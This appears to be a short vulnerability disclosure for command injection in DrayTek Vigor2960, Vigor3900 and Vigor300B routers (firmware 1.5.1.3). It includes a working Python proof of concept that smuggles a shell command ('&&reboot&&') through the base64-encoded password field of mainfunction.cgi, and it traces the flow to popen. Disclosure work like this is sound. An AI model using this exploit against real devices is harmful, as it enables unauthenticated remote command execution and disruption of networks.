Vigor2960, Vigor3900, Vigor300B
1.5.1.3
C0ss4ck @ Bytedance Wuheng Lab
2021-07-21
AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H, 9.0
from sys import argv
from base64 import b64encode
import requests
data = {
"URL": "192.168.1.1",
"HOST": "http://192.168.1.1",
"action": "authuser",
"formusername": b64encode(b"admin").decode(),
"formpassword": b64encode(b"admin'&&reboot&&echo '").decode(),
"PHONENUMBER": argv[1]
}
header = {
"Content-Type": "application/raw"
}
url = {
"root": "http://192.168.1.1:80",
"cgi": {
"root": "/cgi-bin",
"uri": {
"mf": "/mainfunction.cgi",
}
}
}
def build_url(p1, p2=None):
if p2:
return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
else:
return url["root"] + url[p1]
session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)
- Location: mainfunction.cgi
- Flow: 0x2c7f4(authuser action callback) => run_command => popen
DrayTek should publish a new firmware